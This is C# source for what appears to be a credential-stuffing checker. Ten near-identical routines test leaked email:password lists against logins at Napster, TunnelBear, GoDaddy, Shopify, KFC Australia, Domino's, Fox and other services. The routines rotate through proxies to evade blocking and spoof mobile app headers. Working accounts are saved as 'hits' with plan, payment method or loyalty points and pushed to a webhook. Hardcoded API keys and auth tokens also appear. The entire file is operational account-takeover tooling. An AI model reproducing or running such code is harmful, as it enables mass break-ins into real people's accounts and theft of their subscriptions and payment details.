public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.UserAgent = "HolaVPN/2.12 (iPhone; iOS 12.4.7; Scale/2.00)"; req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = true; var str = "brand=Apowersoft&email=" + array[0] + "&language=en&password="******"", str, "application/x-www-form-urlencoded").ToString(); var flag7 = text2.Contains("nickname"); if (flag7) { Program.Hits++; Program.TotalChecks++; Export.AsResult("/Apowersoft_hits", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintHit("Apowersoft", array[0] + ":" + array[1]); } if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1], "Apowersoft Hits"); } } else { Program.Fails++; Program.TotalChecks++; } } catch (Exception) { Program.Combos.Add(text); req.Dispose(); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { var capture = new StringBuilder(); switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.IgnoreProtocolErrors = true; req.UserAgent = "Napster/3537 CFNetwork/1120 Darwin/19.0.0"; req.AddHeader("Host", ""); req.AddHeader("appId", "com.rhapsody.iphone.Rhapsody3"); req.AddHeader("appVersion", "6.5"); req.AddHeader("cpath", "app_iPad7_4"); req.AddHeader("deviceid", "4387508C-483B-479A-BBC1-E078269AE0S4"); req.AddHeader("ocode", "tablet_ios"); req.AddHeader("package_name", "com.rhapsody.iphone.Rhapsody3"); req.AddHeader("pcode", "tablet_ios"); req.AddHeader("playerType", "ios_6_5"); req.AddHeader("provisionedMCCMNC", "310+150"); req.AddHeader("rsrc", "ios_6.5"); var res = req.Post("", string.Concat("username="******"&password="******"&devicename=Elite%20Money&provisionedMCCMNC=310%2B150&package_name=com.rhapsody.iphone.Rhapsody3"), "application/x-www-form-urlencoded").ToString(); if (!res.Contains("INVALID_USERNAME_OR_PASSWORD")) { var text3 = Parse(res, "{\"accountType\":\"", "\""); var text5 = Parse(res, "\"country\":\"", "\""); Program.Hits++; Program.TotalChecks++; if (Program.lorc == "LOG") { Settings.PrintHit("Napster", array[0] + ":" + array[1] + " | Sub: " + text3 + " | Country: " + text5); } Export.AsResult("/Napster_hits", array[0] + ":" + array[1] + " | Sub: " + text3 + " | Country: " + text5); } else { Program.Fails++; Program.TotalChecks++; } } catch (Exception) { Program.Combos.Add(text); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.UserAgent = "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36"; req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = true; var str = "utf8=%E2%9C%93&nexturl=&login="******"&password="******"", str, "application/x-www-form-urlencoded").ToString(); var flag7 = text2.Contains("href=\"/users/home\""); if (flag7) { Program.Hits++; Program.TotalChecks++; Export.AsResult("/Mingle.com_hits", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintHit("", array[0] + ":" + array[1]); } if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1], " Hits"); } } else { Program.Fails++; Program.TotalChecks++; } } catch (Exception) { Program.Combos.Add(text); req.Dispose(); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = true; req.AddHeader("User-Agent", "Mozilla/5.0 (Linux; Android 6.0.1; SM-J106H Build/MMB29Q; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/84.0.4147.105 Mobile Safari/537.36 hasFix PHAPP"); req.AddHeader("Host", ""); req.AddHeader("X-Amz-Target", "AWSCognitoIdentityProviderService.InitiateAuth"); req.AddHeader("X-Environment-Flag", "production"); req.AddHeader("X-Amz-User-Agent", "aws-amplify/0.1.x js"); req.AddHeader("Content-Type", "application/x-amz-json-1.1"); req.AddHeader("Origin", ""); req.AddHeader("X-Requested-With", "com.pizzahutuk.orderingApp"); var str = "{\"AuthFlow\":\"USER_SRP_AUTH\",\"ClientId\":\"39sg678apec8n28fj4ekuuc8fl\",\"AuthParameters\":{\"USERNAME\":\"" + array[0] + "\",\"SRP_A\":\"cf1f8246611b2d6c2f36b68a58ad8f1a10c57ba04965f6b3c24dfc1dbff6ae22b4f5e86ea790d66dde2befcd9d4d0e26e8d217c81cab0a456f2f26e5c9dd96d173bad0699ab48fc6297e524d093a2c16fe4fb30a958041b717120f68da42401f0733d3c19d3b7e127dc0cff9e1cb1b15adce363b696f45d2ce763a25783830a4ff45c71c817350779398b1783f36f0415912b2c284c161f4ed135ac3ad501b3b3557745c1a66c2af35034b9a34e02a012bd0642f0d90e162da9cd4cac6e5943b98c1bc47d1c9cd9fd0a1742b54c05fd79470ba755f49c64c6a67e37d5dc6a14f21c2ca6ada83e1bb0a412945e067607e487ce8964828535a58ddf9fe5ba6872ca8a578773872ccd6b648beb988e74fa955c8058989f1b3801f39adc81d87560614b609f5c5077b5a0fb643c751e57c5e93269ea3c92dcf64e00ddb37e6f56ee0978cd020d4b15477511913ee38f211bda96fe378f4fde118b3b3adb57c1e1c2a264fe102129eb1390c39f827f8c08df94f3a0d3219845110f8d9b8f47bd833f2\"},\"ClientMetadata\":{}}"; req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); var strResponse = req.Post("", str, "application/x-amz-json-1.1").ToString(); { if (strResponse.Contains("User does not exist")) { Program.Fails++; Program.TotalChecks++; } else if (strResponse.Contains("ChallengeName\":\"PASSWORD_VERIFIER")) { Program.Hits++; Program.TotalChecks++; Export.AsResult("/PizzaUKvalidmail_hits", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintHit("PizzaUKvalidmail", array[0] + ":" + array[1]); } if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1], "PizzaUKvalidmail Hits"); } } else { Program.Fails++; Program.TotalChecks++; } } } catch (Exception) { Program.Combos.Add(text); req.Dispose(); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); req.AddHeader("Content-Type", "application/x-www-form-urlencoded"); var strResponse = req.Post(new Uri(""), new BytesContent(Encoding.Default.GetBytes( $"username={array[0]}&password={array[1]}&withUserDetails=true&v=web-1.0"))) .ToString(); if (strResponse.Contains("result\":\"PASS")) { var jsonObj = (JObject)JsonConvert.DeserializeObject(strResponse); var plan = jsonObj["details"]["paymentStatus"].ToString(); if (plan == "FREE") { Program.Frees++; Program.TotalChecks++; if (Program.lorc == "LOG") { Settings.PrintFree("Tunnelbear", array[0] + ":" + array[1]); } Export.AsResult("/Tunnelbear_frees", array[0] + ":" + array[1]); } else { Program.Hits++; Program.TotalChecks++; Export.AsResult("/Tunnelbear_hits", array[0] + ":" + array[1] + " | Plan: " + plan); if (Program.lorc == "LOG") { Settings.PrintHit("Tunnelbear", array[0] + ":" + array[1] + " | Plan: " + plan); } if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1] + " | Plan: " + plan, "Tunnelbear Hits"); } } } else { Program.Fails++; Program.TotalChecks++; } } catch (Exception) { Program.Combos.Add(text); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { var capture = new StringBuilder(); switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"; req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = false; req.AddHeader("Cookie", "visitor=vid=b35ec6bc-83fe-429e-9166-e335881f061a;"); req.AddHeader("Host", ""); req.AddHeader("Origin", ""); req.AddHeader("Referer", ""); req.AddHeader("Sec-Fetch-Dest", "empty"); req.AddHeader("Sec-Fetch-Mode", "cors"); req.AddHeader("Sec-Fetch-Site", "same-origin"); var str = "{\"checkusername\":\"" + array[0] + "\"}"; req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); var strResponse = req.Post("", str, "application/json").ToString(); { if (strResponse.Contains("username is invalid") || strResponse.Contains("username is available")) { Program.Fails++; Program.TotalChecks++; } else if (strResponse.Contains("username is unavailable") || strResponse.Contains("message\": \"Ok")) //hit { req.AddHeader("Cookie", "visitor=vid=b35ec6bc-83fe-429e-9166-e335881f061a;"); req.AddHeader("Host", ""); req.AddHeader("DNT", "1"); req.AddHeader("Origin", ""); req.AddHeader("Referer", ""); req.AddHeader("Sec-Fetch-Dest", "empty"); req.AddHeader("Sec-Fetch-Mode", "cors"); req.AddHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36"); var str2 = "{\"username\":\"" + array[0] + "\",\"password\":\"" + array[1] + "\",\"remember_me\":false,\"plid\":1,\"API_HOST\":\"\",\"captcha_code\":\"\",\"captcha_type\":\"recaptcha_v2_invisible\"}"; var strResponse2 = req.Post( "", str2, "application/json").ToString(); if (strResponse2.Contains("Username and password did not match")) { Program.Fails++; Program.TotalChecks++; } else if (strResponse2.Contains("message\": \"Ok\"")) { Program.Hits++; Program.TotalChecks++; Export.AsResult("/Godaddy_hits", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintHit("Godaddy", array[0] + ":" + array[1]); } if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1], "Godaddy Hits"); } } } } } catch (Exception) { Program.Combos.Add(text); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.UserAgent = "Shopify Mobile/Android/8.26.0 (Build 32571 with API 22 on Samsung SM-N950N)"; req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = false; req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); var text2 = req.Post("", string.Concat("{\"email\":\"", array[0], "\",\"password\":\"", array[1], "\"}"), "application/json").ToString(); var flag7 = text2.Contains("{\"subdomain\":\""); if (flag7) { Program.Hits++; Program.TotalChecks++; Export.AsResult("/Shopify_hits", array[0] + ":" + array[1]); if (Program.lorc == "LOG") { Settings.PrintHit("Shopify", array[0] + ":" + array[1]); } if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1], "Shopify Hits"); } } else { Program.Fails++; Program.TotalChecks++; } } catch (Exception) { Program.Combos.Add(text); req.Dispose(); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text5 = array[0] + ":" + array[1]; try { var capture = new StringBuilder(); switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = false; req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); req.AddHeader("X-Api-AppVersion", ""); req.AddHeader("X-Api-Channel", "Android App"); req.AddHeader("X-Api-AppPlatform", "5"); req.AddHeader("x-api-custom-auth", "Basic S0ZBVTAwMVByb2RAbmNyLmNvbTpNTExscDd2b3JPSXJOdVo2"); req.AddHeader("X-Api-CompanyCode", "KFAU001"); req.AddHeader("Authorization", "Basic S0ZBVTAwMVByb2RAbmNyLmNvbTpNTExscDd2b3JPSXJOdVo2"); req.AddHeader("Connection", "Keep-Alive"); req.AddHeader("Accept-Encoding", "gzip"); req.AddHeader("User-Agent", "okhttp/3.9.1"); var res0 = req.Get( ""); var text0 = res0.ToString(); req.AddHeader("X-Api-AppVersion", ""); req.AddHeader("X-Api-Channel", "Android App"); req.AddHeader("X-Api-AppPlatform", "5"); req.AddHeader("x-api-custom-auth", "Basic S0ZBVTAwMVByb2RAbmNyLmNvbTpNTExscDd2b3JPSXJOdVo2"); req.AddHeader("X-Api-CompanyCode", "KFAU001"); req.AddHeader("Authorization", "Basic S0ZBVTAwMVByb2RAbmNyLmNvbTpNTExscDd2b3JPSXJOdVo2"); req.AddHeader("Connection", "Keep-Alive"); req.AddHeader("Accept-Encoding", "gzip"); req.AddHeader("User-Agent", "okhttp/3.9.1"); var res1 = req.Post("", "{\"Email\":\"" + array[0] + "\",\"Password\":\"" + array[1] + "\"}", "application/json"); var text1 = res1.ToString(); if (text1.Contains("{\"$id\":\"1\",\"access_token\":\"")) { var haha = Functions.LR(text1, "\"id_token\":\"", "\"").FirstOrDefault(); var haha2 = Functions.Base64Decode("" + haha + ""); var client = Functions.LR("" + haha2 + "", "\"CustomerId\":\"", "\"").FirstOrDefault(); var numb = Functions.LR("" + haha2 + "", "\"LoyaltyId\":\"", "\"").FirstOrDefault(); req.AddHeader("X-Api-AppVersion", ""); req.AddHeader("X-Api-Channel", "Android App"); req.AddHeader("X-Api-AppPlatform", "5"); req.AddHeader("x-api-custom-auth", "Basic S0ZBVTAwMVByb2RAbmNyLmNvbTpNTExscDd2b3JPSXJOdVo2"); req.AddHeader("X-Api-CompanyCode", "KFAU001"); req.AddHeader("Authorization", "Basic S0ZBVTAwMVByb2RAbmNyLmNvbTpNTExscDd2b3JPSXJOdVo2"); req.AddHeader("Connection", "Keep-Alive"); req.AddHeader("Accept-Encoding", "gzip"); req.AddHeader("User-Agent", "okhttp/3.9.1"); var res2 = req.Post( "", "{\"CustomerId\":\"" + client + "\",\"SiteId\":196}", "application/json"); var text2 = res2.ToString(); var xx = Functions.LR(text2, "\"", "\"").FirstOrDefault(); var auths = Functions.Base64Decode("" + xx + ""); var fingers = Functions .LR("" + auths + "", "authorizationFingerprint\":\"", "?customer_id=") .FirstOrDefault(); req.AllowAutoRedirect = false; req.AddHeader("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0"); req.AddHeader("Accept", "*/*"); req.AddHeader("Accept-Language", "en-US,en;q=0.5"); req.AddHeader("Accept-Encoding", "gzip, deflate, br"); req.AddHeader("Origin", ""); req.AddHeader("Referer", ""); req.AddHeader("Connection", "keep-alive"); var res3 = req.Get( "" + fingers + "%3Fcustomer_id%3D"); var text3 = res3.ToString(); var payment = Functions.LR(text3, "{\"paymentMethods\":[{\"", "}").FirstOrDefault(); capture.Append(" | payment = " + payment); req.AddHeader("X-Api-AppVersion", ""); req.AddHeader("X-Api-Channel", "Android App"); req.AddHeader("X-Api-AppPlatform", "5"); req.AddHeader("x-api-custom-auth", "Basic S0ZBVTAwMVByb2RAbmNyLmNvbTpNTExscDd2b3JPSXJOdVo2"); req.AddHeader("X-Api-CompanyCode", "KFAU001"); req.AddHeader("Authorization", "Basic S0ZBVTAwMVByb2RAbmNyLmNvbTpNTExscDd2b3JPSXJOdVo2"); req.AddHeader("Connection", "Keep-Alive"); req.AddHeader("Accept-Encoding", "gzip"); req.AddHeader("User-Agent", "okhttp/3.9.1"); var res4 = req.Get("" + numb + "/extendedstandings"); var text4 = res4.ToString(); if (payment.Any()) { Program.Hits++; Program.TotalChecks++; if (Program.lorc == "LOG") { Settings.PrintHit("KFC", array[0] + ":" + array[1] + " | " + capture); } Export.AsResult("/KfcAus_hits", array[0] + ":" + array[1] + " | " + capture); if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1] + " | " + capture, "KFC Hits"); } } else if (text4.Contains( "rewardName\":\"20% Employee Discount\",\"bprewardThreshold\":1.0,\"tierID\":5,\"rewardType\":\"Real-Time Discount\"}],\"availableRewards\":[]") || numb.Contains("\",") || !numb.Any()) { Program.Frees++; Program.TotalChecks++; Export.AsResult("/KfcAus_frees", array[0] + ":" + array[1] + " | " + capture); if (Program.lorc == "LOG") { Settings.PrintFree("KFC", array[0] + ":" + array[1] + " | " + capture); } } } else if (!text1.Contains("{\"$id\":\"1\",\"access_token\":\"")) { break; } } catch (Exception) { Program.Combos.Add(text5); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; } req.IgnoreProtocolErrors = true; req.AllowAutoRedirect = false; req.AddHeader("authorization", "Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Ijg5REEwNkVEMjAxOCIsInR5cCI6IkpXVCJ9.eyJwaWQiOiJ3ZWI3MmQxMTI5MS0yNjM1LTQ3M2YtYTE0MC1jNjYwYzJkZWY1ZDkiLCJ1aWQiOiJkMlZpTnpKa01URXlPVEV0TWpZek5TMDBOek5tTFdFeE5EQXRZelkyTUdNeVpHVm1OV1E1Iiwic2lkIjoiMzcyZGViMWYtNTU5Yi00N2UyLWJkZjAtOTEzMzk4N2JhYzE2Iiwic2RjIjoidXMtZWFzdC0xIiwiYXR5cGUiOiJhbm9ueW1vdXMiLCJkdHlwZSI6IndlYiIsInV0eXBlIjoiZGV2aWNlSWQiLCJkaWQiOiI3MmQxMTI5MS0yNjM1LTQ3M2YtYTE0MC1jNjYwYzJkZWY1ZDkiLCJtdnBkaWQiOiIiLCJ2ZXIiOjIsImV4cCI6MTYzMTUzMjcxNiwianRpIjoiNmM2NmM5YTEtODYzOS00NWIxLWJlYTgtOGNjOGY3OGVkNWZlIiwiaWF0IjoxNTk5OTk2NzE2fQ.hXHKh4tAZ4rLbPsqmFDA99TIThN79ZUZSAlC8S0zSIqnItxRoimOO81edPwuG00rE4O4GNsTKxYxZldFo54P0jcCS4UmRAZoEG0t14T5l0wMoMfdWqJj3elx-aF1QKM8BFWj41LdaTIgCj8xv7n5Xf8LLS3Ibcq7JpLNA1HTrON7nWHvsAge4UpF4C1a3kXS8RPN0VnsFCVgbZOyvH7WXva530unsNFDgt3pfWqua2ukmUwe9YV28hnWXSNzsmzMKecIIp8gYpyEuaJOmiL1lW68PulhqYcsm3wKG0sPvvjfh-7xyveJp1pb5r87OYzWwA1PVjYAE7HZQnnlflNWOg"); req.AddHeader("x-api-key", "6E9S4bmcoNnZwVLOHywOv8PJEdu76cM9"); req.AddHeader("x-dcg-udid", "72d11291-2635-473f-a140-c660c2def5d9"); req.AddHeader("user-agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36"); var str = "{\"password\":\"" + array[1] + "\",\"email\":\"" + array[0] + "\"}"; req.SslCertificateValidatorCallback = (RemoteCertificateValidationCallback)Delegate.Combine( req.SslCertificateValidatorCallback, new RemoteCertificateValidationCallback((obj, cert, ssl, error) => (cert as X509Certificate2).Verify())); var strResponse = req.Post("", str, "application/json;charset=UTF-8").ToString(); { if (strResponse.Contains("Invalid login credentials")) { Program.TotalChecks++; Program.Fails++; } else if (strResponse.Contains("accessToken")) { var AccountType = Parse(strResponse, "accountType\":\"", "\",\""); var Brand = Parse(strResponse, "brand\":\"", "\",\""); var Platform = Parse(strResponse, "platform\":\"", "\",\""); var Device = Parse(strResponse, "device\":\"", "\",\""); Program.Hits++; Program.TotalChecks++; Export.AsResult("/Fox_hits", array[0] + ":" + array[1] + " | Account Type: " + AccountType + " | Brand: " + Brand + " | Platform: " + Platform + " | Device: " + Device); if (Program.lorc == "LOG") { Settings.PrintHit("Fox", array[0] + ":" + array[1] + " | Account Type: " + AccountType + " | Brand: " + Brand + " | Platform: " + Platform + " | Device: " + Device); } if (Settings.sendToWebhook) { Settings.sendTowebhook1( array[0] + ":" + array[1] + " | Account Type: " + AccountType + " | Brand: " + Brand + " | Platform: " + Platform + " | Device: " + Device, "Fox hits"); } } } } catch (Exception) { Program.Combos.Add(text); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
public static void Check() { for (;;) { if (Program.Proxyindex > Program.Proxies.Count() - 2) { Program.Proxyindex = 0; } try { Interlocked.Increment(ref Program.Proxyindex); using (var req = new HttpRequest()) { if (Combosindex >= Combos.Count()) { Program.Stop++; break; } Interlocked.Increment(ref Combosindex); var array = Combos[Combosindex].Split(':', ';', '|'); var text = array[0] + ":" + array[1]; try { switch (Program.ProxyType1) { case "HTTP": req.Proxy = HttpProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS4": req.Proxy = Socks4ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "SOCKS5": req.Proxy = Socks5ProxyClient.Parse(Program.Proxies[Program.Proxyindex]); req.Proxy.ConnectTimeout = 5000; break; case "NO": req.Proxy = null; break; } req.AllowAutoRedirect = false; req.IgnoreProtocolErrors = true; req.UserAgent = "DominosAndroid/6.4.1 (Android 5.1; unknown/Google Nexus 6; en)"; var str1 = "grant_type=password&validator_id=VoldemortCredValidator&client_id=nolo-rm&scope=customer%3Acard%3Aread+customer%3Aprofile%3Aread%3Aextended+customer%3AorderHistory%3Aread+customer%3Acard%3Aupdate+customer%3Aprofile%3Aread%3Abasic+customer%3Aloyalty%3Aread+customer%3AorderHistory%3Aupdate+customer%3Acard%3Acreate+customer%3AloyaltyHistory%3Aread+order%3Aplace%3AcardOnFile+customer%3Acard%3Adelete+customer%3AorderHistory%3Acreate+customer%3Aprofile%3Aupdate+easyOrder%3AoptInOut+easyOrder%3Aread&username="******"&password="******"", str1, "application/x-www-form-urlencoded").ToString(); if (input.Contains("access_token")) { var str2 = Regex.Match(input, "access_token\":\"(.*?)\"").Groups[1].Value; req.Authorization = "Bearer " + str2; req.UserAgent = "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"; var str3 = Regex .Match( req.Post("", "loyaltyIsActive=true&rememberMe=false&u=" + array[1] + "&p=" + array[1], "application/x-www-form-urlencoded").ToString(), ",\"CustomerID\":\"(.*?)\"").Groups[1].Value; var str4 = Regex .Match( req.Get("" + str3 + "/loyalty?_=1581984138984").ToString(), "VestedPointBalance\":(.*?),") .Groups[1].Value; Program.TotalChecks++; Program.Hits++; if (Program.lorc == "LOG") { Settings.PrintHit("Dominos", array[0] + ":" + array[1] + " | Points: " + str4); } Export.AsResult("/Dominos_hits", array[0] + ":" + array[1] + " | Points: " + str4); if (Settings.sendToWebhook) { Settings.sendTowebhook1(array[0] + ":" + array[1], "Dominos"); } req.Dispose(); } if (input.Contains("Invalid username & password combination")) { Program.TotalChecks++; Program.Fails++; } else { Program.Combos.Add(text); req.Dispose(); } } catch (Exception) { Program.Combos.Add(text); } } } catch { Interlocked.Increment(ref Program.Errors); } } }
